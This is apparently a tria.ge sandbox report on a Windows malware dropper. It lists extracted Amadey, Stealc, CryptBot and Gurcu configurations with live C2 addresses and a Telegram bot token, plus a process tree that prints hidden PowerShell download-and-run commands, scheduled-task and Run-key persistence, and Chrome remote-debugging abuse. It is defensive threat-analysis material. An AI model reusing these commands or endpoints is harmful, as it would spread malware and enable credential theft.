Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

19/02/2025, 19:57

250219-ypbcwsxngx 10

19/02/2025, 18:32

250219-w641eswqak 10

Analysis

  • max time kernel
    116s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/02/2025, 19:57

General

  • Target

    c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe

  • Size

    5.5MB

  • MD5

    adbdacaaa99af43ad5e4bfb84c2695b3

  • SHA1

    3356d266532067786bc20048346c5ccc5c26680b

  • SHA256

    c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670

  • SHA512

    a123879d0ba85b72b6965859aa08c2c6e6439f501ca7541beb89d5d13c19a774a1af370125c232dfb02d981ef7f10ca35460fe8aad0e11c80b1d4140ce6418aa

  • SSDEEP

    98304:0z/V1YLUtSRelU4RPYUH3DgsFNaPfLhzVrdh7dd+lKNJEmdY:g/TJtSkvHnkHR7hxddNJLdY

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

cryptbot

C2

http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk17

Extracted

Family

gurcu

C2

https://api.telegram.org/bot8137491253:AAGtzzksvWzp8x32tBFwAQNfoEy9cZZaWcQ/sendDocument?chat_id=-4752614650&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot8137491253:AAGtzzksvWzp8x32tBFwAQNfoEy9cZZaWcQ/sendMessage?chat_id=-4752614650

https://api.telegram.org/bot8137491253:AAGtzzksvWzp8x32tBFwAQNfoEy9cZZaWcQ/getUpdates?offset=-

https://api.telegram.org/bot8137491253:AAGtzzksvWzp8x32tBFwAQNfoEy9cZZaWcQ/sendDocument?chat_id=-4752614650&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Milleniumrat family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Detects GOST tunneling tool 1 IoCs

    A simple tunneling tool written in Golang

  • Downloads MZ/PE file 28 IoCs
  • Uses browser remote debugging 2 TTPs 11 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 48 IoCs
  • Identifies Wine through registry keys 2 TTPs 19 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 35 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 19 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 17 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
    "C:\Users\Admin\AppData\Local\Temp\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x8b75.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x8b75.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1464
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M25d5.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M25d5.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1428
          • C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe
            "C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"
            5⤵
            • Executes dropped EXE
            PID:1228
          • C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
            "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1904
            • C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
              "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4864
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 948
              6⤵
              • Program crash
              PID:4704
          • C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
            "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:5100
            • C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
              "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5088
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 948
              6⤵
              • Program crash
              PID:2616
          • C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
            "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1800
            • C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
              "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3264
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 932
              6⤵
              • Program crash
              PID:3800
          • C:\Users\Admin\AppData\Local\Temp\1087747001\yOO5EOR.exe
            "C:\Users\Admin\AppData\Local\Temp\1087747001\yOO5EOR.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2260
            • C:\Users\Admin\AppData\Local\Temp\built anti vm.exe
              "C:\Users\Admin\AppData\Local\Temp\built anti vm.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4928
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp5985.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp5985.tmp.bat
                7⤵
                  PID:3932
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    8⤵
                      PID:4044
                    • C:\Windows\system32\tasklist.exe
                      Tasklist /fi "PID eq 4928"
                      8⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3868
                    • C:\Windows\system32\find.exe
                      find ":"
                      8⤵
                        PID:4136
                      • C:\Windows\system32\timeout.exe
                        Timeout /T 1 /Nobreak
                        8⤵
                        • Delays execution with timeout.exe
                        PID:2228
                      • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                        8⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:4168
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                          9⤵
                            PID:2212
                            • C:\Windows\system32\reg.exe
                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                              10⤵
                              • Adds Run key to start application
                              • Modifies registry key
                              PID:4044
                  • C:\Users\Admin\AppData\Local\Temp\1087771101\3aac5dd9aa.exe
                    "C:\Users\Admin\AppData\Local\Temp\1087771101\3aac5dd9aa.exe"
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:396
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c schtasks /create /tn hmpi5maeLd1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LL8i8Sfu.hta" /sc minute /mo 25 /ru "Admin" /f
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:232
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn hmpi5maeLd1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LL8i8Sfu.hta" /sc minute /mo 25 /ru "Admin" /f
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1260
                    • C:\Windows\SysWOW64\mshta.exe
                      mshta C:\Users\Admin\AppData\Local\Temp\1LL8i8Sfu.hta
                      6⤵
                      • Checks computer location settings
                      • System Location Discovery: System Language Discovery
                      PID:3620
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                        7⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Downloads MZ/PE file
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5028
                        • C:\Users\Admin\AppData\Local\TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
                          "C:\Users\Admin\AppData\Local\TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE"
                          8⤵
                          • Modifies Windows Defender DisableAntiSpyware settings
                          • Modifies Windows Defender Real-time Protection settings
                          • Modifies Windows Defender TamperProtection settings
                          • Modifies Windows Defender notification settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1340
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd" "
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4160
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd" any_word
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:2776
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 2
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Delays execution with timeout.exe
                        PID:3236
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:4368
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1676
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:5076
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2292
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:2724
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1564
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn "gsfI8madSfu" /tr "mshta \"C:\Temp\YgZJfCWtD.hta\"" /sc minute /mo 25 /ru "Admin" /f
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:3268
                      • C:\Windows\SysWOW64\mshta.exe
                        mshta "C:\Temp\YgZJfCWtD.hta"
                        7⤵
                        • Checks computer location settings
                        • System Location Discovery: System Language Discovery
                        PID:3236
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                          8⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Downloads MZ/PE file
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4428
                          • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                            "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                            9⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            PID:1260
                  • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
                    "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    PID:4892
                    • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
                      "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:5076
                    • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
                      "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1512
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 972
                      6⤵
                      • Program crash
                      PID:2360
                  • C:\Users\Admin\AppData\Local\Temp\1087989001\amnew.exe
                    "C:\Users\Admin\AppData\Local\Temp\1087989001\amnew.exe"
                    5⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:1908
                    • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                      6⤵
                      • Downloads MZ/PE file
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2936
                      • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1804
                        • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                          "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2316
                      • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                        "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:7272
                        • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                          "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                          8⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:7620
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 964
                          8⤵
                          • Program crash
                          PID:5284
                      • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:6464
                        • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                          "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                          8⤵
                          • Executes dropped EXE
                          PID:6508
                        • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                          "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                          8⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:6512
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1052
                          8⤵
                          • Program crash
                          PID:6520
                      • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
                        "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:8040
                  • C:\Users\Admin\AppData\Local\Temp\1088046001\588e9c47e5.exe
                    "C:\Users\Admin\AppData\Local\Temp\1088046001\588e9c47e5.exe"
                    5⤵
                    • Enumerates VirtualBox registry keys
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Checks processor information in registry
                    PID:4760
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                      6⤵
                      • Uses browser remote debugging
                      • Enumerates system info in registry
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3824
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff8cd0fcc40,0x7ff8cd0fcc4c,0x7ff8cd0fcc58
                        7⤵
                          PID:7524
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2052,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2040 /prefetch:2
                          7⤵
                            PID:7652
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1912,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2152 /prefetch:3
                            7⤵
                              PID:7644
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2532 /prefetch:8
                              7⤵
                                PID:7704
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
                                7⤵
                                • Uses browser remote debugging
                                PID:8160
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3300 /prefetch:1
                                7⤵
                                • Uses browser remote debugging
                                PID:8180
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4548,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:1
                                7⤵
                                • Uses browser remote debugging
                                PID:7220
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4292,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4300 /prefetch:8
                                7⤵
                                  PID:5376
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4568 /prefetch:8
                                  7⤵
                                    PID:5056
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
